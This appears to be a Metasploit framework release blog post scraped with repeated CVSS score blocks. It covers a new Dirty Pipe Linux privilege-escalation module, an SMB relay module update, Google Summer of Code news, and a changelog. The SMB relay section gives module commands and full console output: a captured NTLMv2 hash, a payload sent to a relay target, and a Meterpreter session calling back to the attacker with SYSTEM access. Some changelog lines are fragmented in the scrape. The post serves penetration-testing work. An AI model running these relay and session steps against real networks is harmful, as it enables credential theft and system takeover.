9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:S/C:C/I:C/A:C
Thanks to some quick work by timwr, CVE-2022-0847 aka "Dirty Pipe" gives Metasploit a bit of digital plumber’s training. The exploit targeting modern Linux v5 kernels helps elevate user privileges by overwriting a SUID binary of your choice by plunging some payload gold through a pipe.
SMB, that magical ubiquitous service making all that noise on networks, just got even more fun. With the latest updates by adfoster-r7 the windows/smb/smb_relay
module that had been languishing in disuse due to evolutions in the protocol is now more helpful than ever. Users can now relay over SMB versions 2 and 3, and even select multiple targets that Metasploit will intelligently cycle through them to ensure that it is not wasting incoming connections.
Example module usage:
use windows/smb/smb_relay
set RELAY_TARGETS 192.168.123.4 192.168.123.25
set JOHNPWFILE ./relay_results.txt
run
Incoming requests have their hashes captured, as well as being relayed to additional targets to run psexec:
msf6 exploit(windows/smb/smb_relay) > [*] New request from 192.168.123.22
[*] Received request for \admin
[*] Relaying to next target smb://192.168.123.4:445
[+] identity: \admin - Successfully authenticated against relay target smb://192.168.123.4:445
[SMB] NTLMv2-SSP Client : 192.168.123.4
[SMB] NTLMv2-SSP Username : \admin
[SMB] NTLMv2-SSP Hash : admin:::ecedb28bc70302ee:a88c85e87f7dca568c560a49a01b0af8:0101000000000000b53a334e842ed8015477c8fd56f5ed2c0000000002001e004400450053004b0054004f0050002d004e0033004d00410047003500520001001e004400450053004b0054004f0050002d004e0033004d00410047003500520004001e004400450053004b0054004f0050002d004e0033004d00410047003500520003001e004400450053004b0054004f0050002d004e0033004d00410047003500520007000800b53a334e842ed80106000400020000000800300030000000000000000000000000300000174245d682cab0b73bd3ee3c11e786bddbd1a9770188608c5955c6d2a471cb180a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e003100320033002e003100000000000000000000000000
[*] Received request for \admin
[*] identity: \admin - All targets relayed to
[*] 192.168.123.4:445 - Selecting PowerShell target
[*] Received request for \admin
[*] identity: \admin - All targets relayed to
[*] 192.168.123.4:445 - Executing the payload...
[+] 192.168.123.4:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175174 bytes) to 192.168.123.4
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.4:52771 ) at 2022-03-02 22:24:42 +0000
A session will be opened on the relay target with the associated credentials:
msf6 exploit(windows/smb/smb_relay) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows NT AUTHORITY\SYSTEM @ DESKTOP-N3MAG5R 192.168.123.1:4444 -> 192.168.123.4:52771 (192.168.123.4)
Further details can be found in the Metasploit SMB Relay documentation
The Metasploit project is proud to return to Google Summer of Code for 2022. Contributor applications are will open April 4th and close April 19th. Changes this year open the program up to all newcomers of open source that are 18 years and older. Join use on #slack and checkout our How-To and Ideas pages to get started. We are still expanding on ideas and are eager to see what you’d like to add to Metasploit.
5.8
. The module leverages the vulnerability to overwrite an SUID binary in order to gain privileges as the root
user.setg SessionTlvLogging true
. Other values for the SessionTlvLogging
option include console
, false
, and file:<file_location>
.msfconsole
.enumextcmd
and loadlib
commands to log human readable string identifiers in addition to the integer value command ids that were introduced as part of Metasploit 6.setg SessionTlvLogging true
with a Meterpreter session open. Next, run a Meterpreter command such as dir
.lcat
command to Meterpreter which allows the user to cat a local file.to_handler
command on Metasploit payloads. Previously, setting an LPORT
value within a payload would not correctly override the previously set lport
value.auxiliary/client/smtp/emailer
which previously handled multiline SMTP responses incorrectly, stopping the module from emailing the payload successfully.exploit/windows/local/bypassuac_comhijack
module to identify Windows 10 versions 1903 and later as not being affected. This also switches the module to run the check method automatically which will help inform users when the target system is or is not vulnerable.post/windows/manage/persistence_exe
on Windows systems caused by the usage of IO.read
.msfvenom
to use the new signing tool apksigner
instead of jarsigner
, which allows the applications to install successfully on the latest version of Android (Android 11).payload_windows/x64/encrypted_shell
payloadshosts
command tab completion and the --search
option’s functionality.As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:
If you are a git
user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:S/C:C/I:C/A:C